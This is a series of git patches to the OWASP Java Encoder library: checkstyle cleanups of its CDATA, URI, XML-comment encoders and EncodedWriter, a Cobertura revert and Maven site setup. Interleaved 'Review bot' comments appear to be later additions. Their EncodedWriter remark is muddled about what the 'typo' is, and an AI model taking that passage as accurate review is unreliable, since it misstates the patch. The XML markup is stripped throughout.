org.codehaus.mojo + cobertura-maven-plugin + + + org.apache.maven.plugins + maven-pmd-plugin + + 1.5 + true + utf-8 + + + + org.apache.maven.plugins + maven-javadoc-plugin + + + default + + javadoc + + + + + + org.apache.maven.plugins + maven-checkstyle-plugin + + src/main/config/checkstyle.xml + src/main/config/checkstyle-header.txt + + + + + org.codehaus.mojo + findbugs-maven-plugin + + + + + + sign-artifacts + + + performRelease + true + + + + + + org.apache.maven.plugins + maven-gpg-plugin + + + sign-artifacts + verify + + sign + + + + + + + + -- cgit v1.2.3 From fe0574f8b168d6d558129fe4b2c018f10259cba6 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 19:09:30 -0400 Subject: removed check for RedundatThrows --- src/main/config/checkstyle.xml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/src/main/config/checkstyle.xml b/src/main/config/checkstyle.xml index 3a2ea7c..0cf1696 100644 --- a/src/main/config/checkstyle.xml +++ b/src/main/config/checkstyle.xml @@ -133,9 +133,9 @@ - + -- cgit v1.2.3 From 016a7733687c6a5e79d5e4283c6e2244b8f5cc4e Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Tue, 31 Mar 2015 20:00:53 -0400 Subject: reverted to an older version of cobertura --- pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/pom.xml b/pom.xml index 52c7938..bab992c 100755 --- a/pom.xml +++ b/pom.xml @@ -172,7 +172,7 @@ org.codehaus.mojo cobertura-maven-plugin - 2.7 + 2.5.2 org.apache.maven.plugins -- cgit v1.2.3 From 9796d9ec81a997e0fee2ed630837e3d91cf86abd Mon Sep 17 00:00:00 2001 
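Review bot: The checkstyle configuration is referenced as the plain relative paths `src/main/config/checkstyle.xml` and `src/main/config/checkstyle-header.txt`, but plugin configuration inherited from a parent is resolved against the module currently being built, so when `core`, `jsp` and `esapi` run the check these files will be looked up under each module's own `src/main/config/` and not found; the per-module setup this hunk removes used `../checkstyle.xml` with `basedir=${basedir}/..` for exactly this reason. Either anchor the paths to the reactor root (for example `${project.parent.basedir}/src/main/config/checkstyle.xml`, which works when the parent is built in the same reactor) or package the rules as a separate build-tools artifact added as a dependency of `maven-checkstyle-plugin`, which is the approach the plugin documents for multi-module builds. I am inferring the element names here because the XML tags are not rendered in this view.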
From: Jeremy Long Date: Tue, 31 Mar 2015 20:03:11 -0400 Subject: changes to remove empty if statements identified by checkstyle --- .../main/java/org/owasp/encoder/CDATAEncoder.java | 125 ++++++----- .../main/java/org/owasp/encoder/EncodedWriter.java | 65 +++--- .../main/java/org/owasp/encoder/URIEncoder.java | 146 +++++++------ .../java/org/owasp/encoder/XMLCommentEncoder.java | 82 +++----- .../main/java/org/owasp/encoder/XMLEncoder.java | 234 +++++++++------------ 5 files changed, 298 insertions(+), 354 deletions(-) diff --git a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java index 7096a2c..8702a65 100644 --- a/core/src/main/java/org/owasp/encoder/CDATAEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CDATAEncoder.java 
@@ -31,37 +31,38 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally - * good for including large blocks of text that contain characters that - * normally require encoding (ampersand, quotes, less-than, etc...). The - * CDATA context however still does not allow invalid characters, and can - * be closed by the sequence "]]>". This encoder removes invalid XML - * characters, and encodes "]]>" (to "]]>]]<![CDATA[>"). The result is - * that the data integrity is maintained, but the code receiving the output - * will have to handle multiple CDATA events with character events between. - * As an alternate approach, the caller could pre-encode "]]>" to something - * of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use - * this encoder to remove any invalid XML characters. + * CDATAEncoder -- encoder for CDATA sections. CDATA sections are generally good for including large blocks of text that contain + * characters that normally require encoding (ampersand, quotes, less-than, etc...). The CDATA context however still does not + * allow invalid characters, and can be closed by the sequence "]]>". This encoder removes invalid XML characters, and encodes + * "]]>" (to "]]>]]<![CDATA[>"). The result is that the data integrity is maintained, but the code receiving the output will + * have to handle multiple CDATA events with character events between. As an alternate approach, the caller could pre-encode "]]>" + * to something of their choosing (e.g. data.replaceAll("\\]\\]>", "]] >")), then use this encoder to remove any invalid XML + * characters. * * @author Jeff Ichnowski */ class CDATAEncoder extends Encoder { - /** The encoding of @{code "]]>"}. 
*/ - private static final char[] CDATA_END_ENCODED = - "]]>]]".toCharArray(); + /** + * The encoding of @{code "]]>"}. + */ + private static final char[] CDATA_END_ENCODED + = "]]>]]".toCharArray(); - /** Length of {@code "]]>]]"}. */ + /** + * Length of {@code "]]>]]"}. + */ private static final int CDATA_END_ENCODED_LENGTH = 15; - /** Length of {@code "]]>"}. */ + /** + * Length of {@code "]]>"}. + */ private static final int CDATA_END_LENGTH = 3; @Override @@ -83,35 +84,37 @@ class CDATAEncoder extends Encoder { @Override protected int firstEncodedOffset(String input, int off, int len) { final int n = off + len; - int closeCount = 0; - for (int i=off ; i= ' ' || ch == '\n' || ch == '\r' || ch == '\t') { - // valid - } else { + if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') { return i; +// } else { +// // valid } + } else { - if (i+1 < n) { - if (input.charAt(i+1) != ']') { + if (i + 1 < n) { + if (input.charAt(i + 1) != ']') { // "]x" (next character is safe for this to be ']') } else { // "]]?" // keep looping through ']' - for ( ; i+2 < n && input.charAt(i+2) == ']' ; ++i) { + for (; i + 2 < n && input.charAt(i + 2) == ']'; ++i) { // valid } // at this point we've looped through a sequence // of 2 or more "]", if the next character is ">" // we need to encode "]]>". - if (i+2 < n) { - if (input.charAt(i+2) == '>') { + if (i + 2 < n) { + if (input.charAt(i + 2) == '>') { return i; - } else { - // valid +// } else { +// // valid } + } else { return n; } 
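Review bot: The rewritten Javadoc for `CDATA_END_ENCODED` keeps the tag typo `@{code "]]>"}`; the inline-tag form is `{@code "]]>"}`, so as written the tool emits the text literally with a stray `@{` in it. Change the added line to ` * The encoding of {@code "]]>"}.` while this comment is being touched anyway. The class comment is also re-wrapped to roughly 130 columns, which is wider than the other comments in the file; worth confirming against the line-length limit in the new checkstyle configuration before the reflow lands.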
@@ -121,15 +124,15 @@ class CDATAEncoder extends Encoder { } } } else if (ch < Character.MIN_HIGH_SURROGATE) { - if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { - // valid - } else { + if (ch <= Unicode.MAX_C1_CTRL_CHAR && ch != Unicode.NEL) { return i; +// } else { +// // valid } } else if (ch <= Character.MAX_HIGH_SURROGATE) { - if (i+1 < n) { - if (Character.isLowSurrogate(input.charAt(i+1))) { - int cp = Character.toCodePoint(ch, input.charAt(i+1)); + if (i + 1 < n) { + if (Character.isLowSurrogate(input.charAt(i + 1))) { + int cp = Character.toCodePoint(ch, input.charAt(i + 1)); if (Unicode.isNonCharacter(cp)) { return i; } else { @@ -143,16 +146,14 @@ class CDATAEncoder extends Encoder { // end of input, high without low = invalid return i; } - } else if ( - // low surrogate without preceding high surrogate - ch <= Character.MAX_LOW_SURROGATE || - // non characters - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef')) - { + } else if ( // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + || // non characters + ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) { return i; - } else { - // valid +// } else { +// // valid } } @@ -168,7 +169,7 @@ class CDATAEncoder extends Encoder { int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); - for ( ; i= m) { return overflow(input, i, output, j); @@ -191,7 +192,7 @@ class CDATAEncoder extends Encoder { } else { // "]]?" // keep looping through ']' - for ( ; i+2 < n && in[i+2] == ']' ; ++i) { + for (; i + 2 < n && in[i + 2] == ']'; ++i) { if (j >= m) { return overflow(input, i, output, j); } 
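Review bot: Inverting the test in `firstEncodedOffset` to `if (ch < ' ' && ch != '\n' && ch != '\r' && ch != '\t') { return i; }` is correct (it is the exact negation of the old `ch >= ' ' || ...` branch), but the old `else` branches are left behind as commented-out code (`// } else {` / `// // valid`) instead of being deleted, here and again in `@@ -121,15 +124,15 @@` and `@@ -143,16 +146,14 @@`. Dead commented code is the next thing checkstyle will flag and it hides the reason for the check; replace each pair with a one-line why-comment on the condition, for example `// C0 control characters other than TAB, LF and CR are rejected` for this one and `// C1 controls other than NEL are rejected` for the `MAX_C1_CTRL_CHAR` test. In `@@ -143` the `// non characters` comment now sits between `||` and its operand; keep it on its own line above the condition. The method's body continues past the end of this hunk.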
@@ -200,9 +201,9 @@ class CDATAEncoder extends Encoder { // at this point we've looped through a sequence // of 2 or more "]", if the next character is ">" // we need to encode "]]>". - if (i+2 < n) { - if (in[i+2] == '>') { - if (j+CDATA_END_ENCODED_LENGTH > m) { + if (i + 2 < n) { + if (in[i + 2] == '>') { + if (j + CDATA_END_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } System.arraycopy(CDATA_END_ENCODED, 0, out, j, CDATA_END_ENCODED_LENGTH); @@ -215,7 +216,7 @@ class CDATAEncoder extends Encoder { out[j++] = ']'; } } else if (endOfInput) { - if (j+2 > m) { + if (j + 2 > m) { return overflow(input, i, output, j); } out[j++] = ']'; @@ -252,9 +253,9 @@ class CDATAEncoder extends Encoder { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; } } else if (ch <= Character.MAX_HIGH_SURROGATE) { - if (i+1 < n) { - if (Character.isLowSurrogate(in[i+1])) { - int cp = Character.toCodePoint(ch, in[i+1]); + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { + int cp = Character.toCodePoint(ch, in[i + 1]); if (Unicode.isNonCharacter(cp)) { if (j >= m) { return overflow(input, i, output, j); @@ -262,7 +263,7 @@ class CDATAEncoder extends Encoder { out[j++] = XMLEncoder.INVALID_CHARACTER_REPLACEMENT; ++i; } else { - if (j+1 >= m) { + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = ch; @@ -284,13 +285,11 @@ class CDATAEncoder extends Encoder { } else { break; } - } else if ( - // low surrogate without preceding high surrogate - ch <= Character.MAX_LOW_SURROGATE || - // non characters - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef')) - { + } else if ( // low surrogate without preceding high surrogate + ch <= Character.MAX_LOW_SURROGATE + || // non characters + ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) { if (j >= m) { return overflow(input, i, output, j); } diff --git a/core/src/main/java/org/owasp/encoder/EncodedWriter.java b/core/src/main/java/org/owasp/encoder/EncodedWriter.java index 685c976..59da149 100644 
--- a/core/src/main/java/org/owasp/encoder/EncodedWriter.java +++ b/core/src/main/java/org/owasp/encoder/EncodedWriter.java @@ -31,7 +31,6 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.io.IOException; @@ -40,8 +39,7 @@ import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * EncodedWriter -- A writer the encodes all input for a specific - * context and writes the encoded output to another writer. + * EncodedWriter -- A writer the encodes all input for a specific context and writes the encoded output to another writer. * * @author Jeff Ichnowski */ @@ -49,11 +47,11 @@ public class EncodedWriter extends Writer { /** * Buffer size to allocate. - * */ + * + */ static final int BUFFER_SIZE = 1024; /** - * Buffer to use for handling characters remaining in the input - * buffer after an encode. The value is set high enough to handle + * Buffer to use for handling characters remaining in the input buffer after an encode. The value is set high enough to handle * the lookaheads of all the encoders in the package. */ static final int LEFT_OVER_BUFFER = 16; 
@@ -69,33 +67,26 @@ public class EncodedWriter extends Writer { private Encoder _encoder; /** - * Where encoded output is buffered before sending on to the - * output writer. + * Where encoded output is buffered before sending on to the output writer. */ private CharBuffer _buffer = CharBuffer.allocate(BUFFER_SIZE); /** - * Some encoders require more input or an explicit end-of-input - * flag before they will process the remaining characters of an - * input buffer. Because the writer API cannot pass this - * information on to the caller (e.g. by returning how many bytes - * were actually written), this writer implementation must buffer - * up the remaining characters between calls. The - * _hasLeftOver boolean is a flag used to indicate - * that there are left over characters in the buffer. + * Some encoders require more input or an explicit end-of-input flag before they will process the remaining characters of an + * input buffer. Because the writer API cannot pass this information on to the caller (e.g. by returning how many bytes were + * actually written), this writer implementation must buffer up the remaining characters between calls. The + * _hasLeftOver boolean is a flag used to indicate that there are left over characters in the buffer. */ private boolean _hasLeftOver; /** - * See comment on _hasLeftOver. This buffer is created on-demand - * once. Whether it has anything to flush is determined by the + * See comment on _hasLeftOver. This buffer is created on-demand once. Whether it has anything to flush is determined by the * _hasLeftOver flag. */ private CharBuffer _leftOverBuffer; /** - * Creates an EncodedWriter that uses the specified encoder to - * encode all input before sending it to the wrapped writer. + * Creates an EncodedWriter that uses the specified encoder to encode all input before sending it to the wrapped writer. * * @param out the target for all writes * @param encoder the encoder to use 
@@ -103,10 +94,10 @@ public class EncodedWriter extends Writer { public EncodedWriter(Writer out, Encoder encoder) { super(out); - if (out == null) { - throw new NullPointerException("writer must not be null"); - } - +// Reduntant null check, super(out) checks for null and throws NPE. +// if (out == null) { +// throw new NullPointerException("writer must not be null"); +// } if (encoder == null) { throw new NullPointerException("encoder must not be null"); } @@ -117,20 +108,18 @@ public class EncodedWriter extends Writer { } /** - * Creates an EncodedWriter that uses the specified encoder to - * encode all input before sending it to the wrapped writer. - * This method is equivalent to calling: + * Creates an EncodedWriter that uses the specified encoder to encode all input before sending it to the wrapped writer. This + * method is equivalent to calling: *
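Review bot: The commented-out null check at the top of the constructor should be deleted rather than left as dead code; the explanatory comment is sufficient on its own and has a typo (`// No explicit null check for out: Writer(Object lock) already throws NullPointerException`). The comment also glosses over a behavioral change: the NPE raised by Writer's constructor carries no message, so callers lose the "writer must not be null" diagnostic the removed check produced. If that message matters and the project's target level permits it, `super(Objects.requireNonNull(out, "writer must not be null"));` keeps the diagnostic while satisfying the super-first rule. The constructor body continues past the hunk.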
          *     new EncodedWriter(out, Encoders.forName(contextName));
          * 
    + * * @param out the target for all writes * @param contextName the encoding context name. - * @throws UnsupportedContextException if the contextName is - * unrecognized or not supported. + * @throws UnsupportedContextException if the contextName is unrecognized or not supported. */ public EncodedWriter(Writer out, String contextName) - throws UnsupportedContextException - { + throws UnsupportedContextException { this(out, Encoders.forName(contextName)); } @@ -138,7 +127,7 @@ public class EncodedWriter extends Writer { public void write(char[] cbuf, int off, int len) throws IOException { synchronized (lock) { CharBuffer input = CharBuffer.wrap(cbuf); - input.limit(off+len).position(off); + input.limit(off + len).position(off); flushLeftOver(input); @@ -163,8 +152,7 @@ public class EncodedWriter extends Writer { } /** - * Flushes the contents of the buffer to the writer and resets the - * buffer to make room for more input. + * Flushes the contents of the buffer to the writer and resets the buffer to make room for more input. * * @throws IOException thrown by the wrapped output. */ @@ -174,17 +162,14 @@ public class EncodedWriter extends Writer { } /** - * Flushes the left-over buffer. Characters from the input buffer - * are used to add more data to the _leftOverBuffer in order to + * Flushes the left-over buffer. Characters from the input buffer are used to add more data to the _leftOverBuffer in order to * make the flush happen. * - * @param input the next input to encode, or null if at end of - * file. + * @param input the next input to encode, or null if at end of file. * @throws IOException from the underlying writer. */ private void flushLeftOver(CharBuffer input) - throws IOException - { + throws IOException { if (!_hasLeftOver) { return; } diff --git a/core/src/main/java/org/owasp/encoder/URIEncoder.java b/core/src/main/java/org/owasp/encoder/URIEncoder.java index 5088b11..9810dab 100644 --- a/core/src/main/java/org/owasp/encoder/URIEncoder.java 
+++ b/core/src/main/java/org/owasp/encoder/URIEncoder.java @@ -31,7 +31,6 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; @@ -44,16 +43,21 @@ import java.nio.charset.CoderResult; */ class URIEncoder extends Encoder { - /** Number of characters in the range '0' to '9'. */ + /** + * Number of characters in the range '0' to '9'. + */ static final int CHARS_0_TO_9 = 10; - /** Number of characters in the range 'a' to 'z'. */ + /** + * Number of characters in the range 'a' to 'z'. + */ static final int CHARS_A_TO_Z = 26; - /** Number of bits in a long. */ + /** + * Number of bits in a long. + */ static final int LONG_BITS = 64; /** - * Maximum number of characters quired to encode a single input - * character. + * Maximum number of characters quired to encode a single input character. */ static final int MAX_ENCODED_CHAR_LENGTH = 9; /** 
@@ -65,23 +69,19 @@ class URIEncoder extends Encoder { */ static final int MAX_UTF8_2_BYTE = 0x7ff; /** - * When the encoded output requires 2 bytes, this is the high - * bits of the first byte. + * When the encoded output requires 2 bytes, this is the high bits of the first byte. */ static final int UTF8_2_BYTE_FIRST_MSB = 0xc0; /** - * When the encoded output requires 3 bytes, this is the high - * bits of the first byte. + * When the encoded output requires 3 bytes, this is the high bits of the first byte. */ static final int UTF8_3_BYTE_FIRST_MSB = 0xe0; /** - * When the encoded output requires 4 bytes, this is the high - * bits of the first byte. + * When the encoded output requires 4 bytes, this is the high bits of the first byte. */ static final int UTF8_4_BYTE_FIRST_MSB = 0xf0; /** - * For all characters in a 2-4 byte encoded sequence after the first - * this is the high bits of the input bytes. + * For all characters in a 2-4 byte encoded sequence after the first this is the high bits of the input bytes. */ static final int UTF8_BYTE_MSB = 0x80; @@ -100,11 +100,9 @@ class URIEncoder extends Encoder { static final char INVALID_REPLACEMENT_CHARACTER = '-'; /** - * RFC 3986 -- "The uppercase hexadecimal digits 'A' through 'F' are - * equivalent to the lowercase digits 'a' through 'f', respectively. If two - * URIs differ only in the case of hexadecimal digits used in percent- - * encoded octets, they are equivalent. For consistency, URI producers and - * normalizers should use uppercase hexadecimal digits for all percent- + * RFC 3986 -- "The uppercase hexadecimal digits 'A' through 'F' are equivalent to the lowercase digits 'a' through 'f', + * respectively. If two URIs differ only in the case of hexadecimal digits used in percent- encoded octets, they are + * equivalent. For consistency, URI producers and normalizers should use uppercase hexadecimal digits for all percent- * encodings." */ static final char[] UHEX = "0123456789ABCDEF".toCharArray(); 
@@ -113,40 +111,35 @@ class URIEncoder extends Encoder { // 0x20: ! " # $ % & ' ( ) * + , - . / 0 1 2 3 4 5 6 7 8 9 : ; < = > ? // 0x40: @ A B C D E F G H I J K L M N O P Q R S T U V W X Y Z [ \ ] ^ _ // 0x60: ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~ - - // ASCII table of RFC 3986 "Unreserved Characters" // 0x20: - . 0 1 2 3 4 5 6 7 8 9 // 0x40: A B C D E F G H I J K L M N O P Q R S T U V W X Y Z _ // 0x60: a b c d e f g h i j k l m n o p q r s t u v w x y z ~ - // Note: (1L << n) - 1 is bit arithmetic to get n 1 bits. // e.g. (1L << 10) = binary 10000000000 // binary 10000000000 = 1111111111 - /** - * RFC 3986 Unreserved Characters. The first 64. + * RFC 3986 Unreserved Characters. The first 64. *
          *     unreserved  = ALPHA / DIGIT / "-" / "." / "_" / "~"
          * 
    */ - static final long UNRESERVED_MASK_LOW = - (((1L << CHARS_0_TO_9) - 1) << '0') | (1L << '-') | (1L << '.'); + static final long UNRESERVED_MASK_LOW + = (((1L << CHARS_0_TO_9) - 1) << '0') | (1L << '-') | (1L << '.'); /** - * RFC 3986 Unreserved Characters. The second 64. + * RFC 3986 Unreserved Characters. The second 64. *
          *     unreserved  = ALPHA / DIGIT / "-" / "." / "_" / "~"
          * 
    */ - static final long UNRESERVED_MASK_HIGH = - (((1L << CHARS_A_TO_Z) - 1) << ('a' - LONG_BITS)) | - (((1L << CHARS_A_TO_Z) - 1) << ('A' - LONG_BITS)) | - (1L << ('_' - LONG_BITS)) | (1L << ('~' - LONG_BITS)); - + static final long UNRESERVED_MASK_HIGH + = (((1L << CHARS_A_TO_Z) - 1) << ('a' - LONG_BITS)) + | (((1L << CHARS_A_TO_Z) - 1) << ('A' - LONG_BITS)) + | (1L << ('_' - LONG_BITS)) | (1L << ('~' - LONG_BITS)); /** - * RFC 3986 Reserved Characters. The first 64. + * RFC 3986 Reserved Characters. The first 64. *
          *   reserved    = gen-delims / sub-delims
          *
    @@ -156,44 +149,44 @@ class URIEncoder extends Encoder {
          *               / "*" / "+" / "," / ";" / "="
          * 
    */ - static final long RESERVED_MASK_LOW = - // gen-delims - (1L << ':') | (1L << '/') | (1L << '?') | (1L << '#') | - // sub-delims - (1L << '!') | (1L << '$') | (1L << '&') | (1L << '\'') | - (1L << '(') | (1L << ')') | (1L << '*') | (1L << '+') | - (1L << ',') | (1L << ';') | (1L << '='); + static final long RESERVED_MASK_LOW + = // gen-delims + (1L << ':') | (1L << '/') | (1L << '?') | (1L << '#') + | // sub-delims + (1L << '!') | (1L << '$') | (1L << '&') | (1L << '\'') + | (1L << '(') | (1L << ')') | (1L << '*') | (1L << '+') + | (1L << ',') | (1L << ';') | (1L << '='); /** * The second 64 RFC 3986 Reserved characters. */ - static final long RESERVED_MASK_HIGH = - // gen-delims - (1L << ('[' - LONG_BITS)) | (1L << (']' - LONG_BITS)) | (1L << ('@' - LONG_BITS)); + static final long RESERVED_MASK_HIGH + = // gen-delims + (1L << ('[' - LONG_BITS)) | (1L << (']' - LONG_BITS)) | (1L << ('@' - LONG_BITS)); /** - * Encoding mode of operation for URI encodes. The modes define - * which characters get encoded using %-encoding, and which do + * Encoding mode of operation for URI encodes. The modes define which characters get encoded using %-encoding, and which do * not. */ public static enum Mode { + /** - * In "component" mode, only the unreserved characters are - * left unescaped. Everything else is escaped. + * In "component" mode, only the unreserved characters are left unescaped. Everything else is escaped. */ COMPONENT(UNRESERVED_MASK_LOW, UNRESERVED_MASK_HIGH), /** - * In "full" mode, all unreserved and reserved characters - * are left unescaped. Anything else is escaped. + * In "full" mode, all unreserved and reserved characters are left unescaped. Anything else is escaped. */ FULL_URI(UNRESERVED_MASK_LOW | RESERVED_MASK_LOW, - UNRESERVED_MASK_HIGH | RESERVED_MASK_HIGH), + UNRESERVED_MASK_HIGH | RESERVED_MASK_HIGH),; - ; - - /** The low bit-mask--copied into the _lowMask of the encoder. */ + /** + * The low bit-mask--copied into the _lowMask of the encoder. 
+ */ final long _lowMask; - /** The high bit-mask--copied into the _highMask of the encoder. */ + /** + * The high bit-mask--copied into the _highMask of the encoder. + */ final long _highMask; /** @@ -209,24 +202,29 @@ class URIEncoder extends Encoder { /** * Accessor for the low bit-mask. + * * @return _lowMask */ - long lowMask() { return _lowMask; } + long lowMask() { + return _lowMask; + } + /** * Accessor for the high bit-mask. + * * @return _highMask */ - long highMask() { return _highMask; } + long highMask() { + return _highMask; + } } /** - * The bit-mask of characters that do not need to be escaped, for - * characters with code-points in the range 0 to 63. + * The bit-mask of characters that do not need to be escaped, for characters with code-points in the range 0 to 63. */ private final long _lowMask; /** - * The bit-mask of characters that do not need to be escaped, for - * character with code-points in the range 64 to 127. + * The bit-mask of characters that do not need to be escaped, for character with code-points in the range 64 to 127. */ private final long _highMask; /** @@ -242,8 +240,7 @@ class URIEncoder extends Encoder { } /** - * Constructor for the URIEncoder the specifies the encoding mode - * the URIEncoder will use. + * Constructor for the URIEncoder the specifies the encoding mode the URIEncoder will use. * * @param mode the encoding mode for this encoder. */ @@ -266,13 +263,13 @@ class URIEncoder extends Encoder { @Override protected int firstEncodedOffset(String input, int off, int len) { final int n = off + len; - for (int i=off ; i>> 2*UTF8_SHIFT); + int b1 = UTF8_3_BYTE_FIRST_MSB | (ch >>> 2 * UTF8_SHIFT); out[j++] = '%'; out[j++] = UHEX[b1 >>> HEX_SHIFT]; out[j++] = UHEX[b1 & HEX_MASK]; 
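Review bot: The `FULL_URI(...),;` produced by moving the enum's terminating semicolon onto the constant line is legal but reads as a formatter artifact, and the stray comma is easy to misread as a missing constant; `UNRESERVED_MASK_HIGH | RESERVED_MASK_HIGH);` is the conventional form. The same reformat left `public static enum Mode`, where `static` is redundant on a nested enum, though that predates this commit. This applies to the `@@ -156,44 +149,44 @@` hunk of URIEncoder.java.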
@@ -342,17 +338,17 @@ class URIEncoder extends Encoder { out[j++] = UHEX[b3 & HEX_MASK]; } else if (ch <= Character.MAX_HIGH_SURROGATE) { // surrogate pair: 2 UTF-16 => 4 UTF-8 bytes - if (i+1 < n) { - if (Character.isLowSurrogate(in[i+1])) { + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { if (j + 4 * PERCENT_ENCODED_LENGTH > m) { return overflow(input, i, output, j); } int cp = Character.toCodePoint(ch, in[++i]); - int b1 = UTF8_4_BYTE_FIRST_MSB | (cp >>> 3*UTF8_SHIFT); + int b1 = UTF8_4_BYTE_FIRST_MSB | (cp >>> 3 * UTF8_SHIFT); out[j++] = '%'; out[j++] = UHEX[b1 >>> HEX_SHIFT]; out[j++] = UHEX[b1 & HEX_MASK]; - int b2 = UTF8_BYTE_MSB | ((cp >>> 2*UTF8_SHIFT) & UTF8_MASK); + int b2 = UTF8_BYTE_MSB | ((cp >>> 2 * UTF8_SHIFT) & UTF8_MASK); out[j++] = '%'; out[j++] = UHEX[b2 >>> HEX_SHIFT]; out[j++] = UHEX[b2 & HEX_MASK]; @@ -392,6 +388,6 @@ class URIEncoder extends Encoder { @Override public String toString() { - return "URIEncoder(mode="+_mode+")"; + return "URIEncoder(mode=" + _mode + ")"; } } diff --git a/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java b/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java index 90d057a..54c59b9 100644 --- a/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java +++ b/core/src/main/java/org/owasp/encoder/XMLCommentEncoder.java 
@@ -31,26 +31,23 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * XMLCommentEncoder -- Encodes for the XML/HTML comment context. The sequence - * "--" is not allowed in comments, and must be removed/replaced. We also must - * be careful of trailing hyphens at end of input, as they could combine with - * the external comment ending sequence "-->" to become "--->", which is also - * invalid. As with all XML-based context, invalid XML characters are not + * XMLCommentEncoder -- Encodes for the XML/HTML comment context. The sequence "--" is not allowed in comments, and must be + * removed/replaced. We also must be careful of trailing hyphens at end of input, as they could combine with the external comment + * ending sequence "-->" to become "--->", which is also invalid. As with all XML-based context, invalid XML characters are not * allowed. * * @author Jeff Ichnowski */ class XMLCommentEncoder extends Encoder { + /** - * This is the character used to replace a hyphen when a sequence - * of hypens is encountered. + * This is the character used to replace a hyphen when a sequence of hypens is encountered. */ static final char HYPHEN_REPLACEMENT = '~'; @@ -63,14 +60,9 @@ class XMLCommentEncoder extends Encoder { // // (Unicode Hyphen) // (Unicode en-dash) - - // Note: HTML comments differ, in that they cannot start with: ">", "->". // On IE, " + - + - - - - + + + + - - - - - - + + + + + + 
@@ -26,125 +26,125 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - - - - - - -- cgit v1.2.3 From 16d8da211657835c7b156de38137513f4f26b316 Mon Sep 17 00:00:00 2001 From: Jeremy Long Date: Wed, 1 Apr 2015 07:12:37 -0400 Subject: initial site setup --- core/src/site/site.xml | 52 +++++++++++++++++++++++++++ esapi/src/site/site.xml | 52 +++++++++++++++++++++++++++ jsp/src/site/site.xml | 52 +++++++++++++++++++++++++++ pom.xml | 41 +++++++++++++++++----- src/site/site.xml | 93 +++++++++++++++++++++++++++++++++++++++++++++++++ 5 files changed, 281 insertions(+), 9 deletions(-) create mode 100644 core/src/site/site.xml create mode 100644 esapi/src/site/site.xml create mode 100644 jsp/src/site/site.xml create mode 100644 src/site/site.xml diff --git a/core/src/site/site.xml b/core/src/site/site.xml new file mode 100644 index 0000000..a382f59 --- /dev/null +++ b/core/src/site/site.xml @@ -0,0 +1,52 @@ + + + + + Encoder + + + + + + + + + + + + \ No newline at end of file diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml new file mode 100644 index 0000000..245a9e6 --- /dev/null +++ b/esapi/src/site/site.xml @@ -0,0 +1,52 @@ + + + + + ESAPI + + + + + + + + + + + + \ No newline at end of file diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml new file mode 100644 index 0000000..8b36802 --- /dev/null +++ b/jsp/src/site/site.xml @@ -0,0 +1,52 @@ + + + + + JSP + + + + + + + + + + + + \ No newline at end of file 
